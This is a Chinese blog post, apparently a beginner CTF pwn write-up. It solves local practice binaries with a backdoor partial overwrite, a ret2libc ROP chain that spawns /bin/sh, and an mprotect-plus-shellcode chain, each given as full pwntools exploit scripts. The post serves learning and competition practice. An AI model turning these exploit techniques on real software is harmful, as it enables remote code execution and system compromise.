CTF中的pwn基础题

最新推荐文章于 2024-05-11 09:52:27 发布
最新推荐文章于 2024-05-11 09:52:27 发布
阅读量770 收藏 13
点赞数 12
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81031055/article/details/135778195
版权

有后门(/bin/sh)

先用checksec指令查看:只有NX保护且为64位。

 用64位IDA打开

发现有栈溢出且溢出了一个字节,shift+f12查看发现有后门函数

双击跟进确认后门函数的地址位0x401209

通过调试发现,main函数与后门函数的地址相差一个字节,所以将09打包成一个字节。

编写脚本:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=process("./pwn1")
elf=ELF("./pwn1")
def bug():
    gdb.attach(p)
    pause()

pay=b'a'*(0x20+8)+p8(0x9)
bug()
p.send(pay)
p.interactive()

本地调试成功!

ret2libc例题

先用checksec指令查看:只有NX保护且为64位。

用64位IDA打开

双击进入ctfshow函数,发现存在栈溢出

通过shift+f12查看是否有后门函数

通过观察IDA中左边的函数,发现没有后门函数,也没有system函数考虑使用ret2libc解题。

64位的传参方式是靠寄存器

一般的寄存器(rdi  ,  rsi  ,  rdx)

动态链接库elf文件想要执行,先跳转到libc信息库,然后才能运行

如果把libc与elf放在一起,就是一个静态链接库,程序可正常运行。

静态链接库内存占用比较大,动态链接库占用很小,只有特定几个函数代码。

动态链接库elf文件想要执行,先跳转到libc信息库,然后才能运行。

elf跟libc是两个单独的文件,elf里的函数想要执行,就得先进入plt表,然后在进入got,got表里的是函数的真实地址。

编写脚本:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn2")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF("./pwn2")
def bug():
	gdb.attach(p)
	pause()
main=0x400745
pop_rdi=0x00000000004007e3


payload=b'a'*(0x20+8)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)

p.sendline(payload)
#leek libc_base================================================
puts_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()
#==============================================================

payload=b'a'*(0x20+8)+p64(pop_rdi)+p64(bin_sh)+p64(pop_rdi+1)+p64(system)
bug()
p.sendline(payload)

p.interactive()

 通过下面这行脚本找到寄存器的地址

ROPgadget --binary pwn2  --only 'pop|ret'

 

 

 下面这些代码是通过gdb在libc库里面找到的libc基址以及函数的真实地址

puts_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()

payload=b'a'*(0x20+8)+p64(pop_rdi)+p64(bin_sh)+p64(pop_rdi+1)+p64(system)

 

这里p64(pop_rdi+1)是因为在调试的时候我们会发现存在栈对齐

 第二种方法:

通过shift+f12观察到让我们使用mprotect函数解题

先了解一下mprotect函数

mprotect 函数用于设置一块内存的保护权限(将从 start 开始、长度为 len 的内存的保护属性修改为 prot 指定的值)

mprotect(start_addr,len,prot)

len一般为很大的数(如:0x1000)

post  (7为可读可写可执行)

例如:

mprotect(0x80EB000,0x1000,7)

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn2")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF("./pwn2")
def bug():
	gdb.attach(p)
	pause()
ctfshow_addr=0x400637
rdi=0x00000000004007e3
p.recvuntil("Hello CTFshow\n")
pay=b'a'*(0x20+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(ctfshow_addr)
bug()
p.sendline(pay)

puts_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
print(hex(libc_base))
mprotect=libc_base+libc.sym['mprotect']
bss=0x602000
rdi=libc_base+0x0000000000023b6a
rsi=libc_base+0x000000000002601f
rdx_r12=libc_base+0x0000000000119431
p.recvuntil("Hello CTFshow\n")
pay=b'a'*(0x20+8)+p64(rdi)+p64(bss)+p64(rsi)+p64(0x1000)+p64(rdx_r12)+p64(7)*2+p64(mprotect)+p64(rdi)+p64(bss)+p64(elf.plt['gets'])+p64(bss)
p.sendline(pay)
pause()
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive(

运用mprotect函数来获取权限

结合libc,shellcode

shellcode与system("bin/sh")的作用相同

asm(shellcraft.sh())是生成shellcode的代码

☜.♡.☞
关注
  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF 一次PWN的小技巧
顶峰
03-28 1098
行文至此,本次测试也就结束了!文章略长,简单做个总结:在本文,我们通过使用CTF示例讨论了漏洞利用开发的过程,我们了解了程序如何从argv和argc接收输入的参数。最后,了解了由于较小的随机范围,32位系统的ASLR为何容易受到攻击,以及如何利用此漏洞进行攻击。我们可以使用 "scp "命令轻松地将我们的脚本上传到服务器的tmp目录下,就像这样。
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1378
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程发生,这也是安全工作人员需要注意审计的地方。
BUUCTF PWN方向 1-6 详解wp
qq_62564422的博客
02-06 1298
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
2024年最新CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1),学习路线+知识点梳理
最新发布
2401_84264244的博客
05-11 393
还有兄弟不知道网络安全面试可以提前刷吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
ctf pwn
m0_64195960的博客
04-11 1319
2022年3月21栈迁移 这道是栈迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以栈溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的栈迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
CTFPWN——无安全防护(栈溢出)
壊壊的诱惑你的博客
09-20 2470
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTFPWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
ctf目系列】ctfwiki pwn类型
weixin_42072280的博客
08-31 1265
我之所以能够执行,是因为我pwndbg是在kali的虚拟机执行的,exp是在我ubuntu的虚拟机执行的,所以可以正常执行;如果是正常调用 system 函数,我们调用的时候会有一个对应的返回地址,这里以’4位垃圾数据’ 作为虚假的地址,其后参数对应的参数内容。看到sh的地址为:0x0x08048736,到ida分析查看,找到了这个sh指的是no_shell-QQ的sh,所以是不能利用的。可以看到有很多个libc版本,可以1个1个的试(因为程序为32位的,所以可以选择性的把64位的去掉)
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 2217
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存分配,直到堆空间
ctf题库ctf-pwn收集
03-31
此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境测试和展示他们的技能。在比赛,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈某个局部变量写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
信息安全_CTFPWN目实例分析.pptx
08-14
CTFPWN目实例分析
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF PWN基础知识(寄存器、栈、汇编指令、标志位)详解
weixin_43780092的博客
09-04 5141
本文详解PWN基础知识,文寄存器缩写都有标注上文含义,方便初学者理解记忆。
BUUCTF PWN 1-15
农夫果园好好喝的博客
08-21 2004
经典栈溢出漏洞。
ctf-pwn入门知识
weixin_41038905的博客
04-06 2695
CTFpwn指的是通过通过程序本身的漏洞编写利用脚本破解程序拿到主机的权限 了解简单的软件防护技术: 栈保护:Canary 堆栈不可执行:NX(No-eXecute) 地址随机化:PIE(position-independent executable, 地址无关可执行)或者叫ALSR(address space layout randomization) ROP(Return-Oriented...
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3103
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作小编用的都是自己的kali环境。
CTF特训营》——PWN:二进制安全基础
PICACHU+++的博客
08-13 2656
即DEP,是进制程序在非可执行的内存区执行指令。在80x86体系,操作系统的内存管理是通过页面表存储方式来实现,其最后一位就是NX位,0表示允许执行,1表示禁止执行。NX一般是防止直接在堆和栈上运行shellcode代码,gcc默认开启不可执行栈功能,添加编译选项z -exestack可开启栈可执行功能。...
CTFpwn入门学习04
2301_79880074的博客
02-21 590
通过两道例学习一下格式化字符串漏洞的两种方法。
ctf 简单pwn资源
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值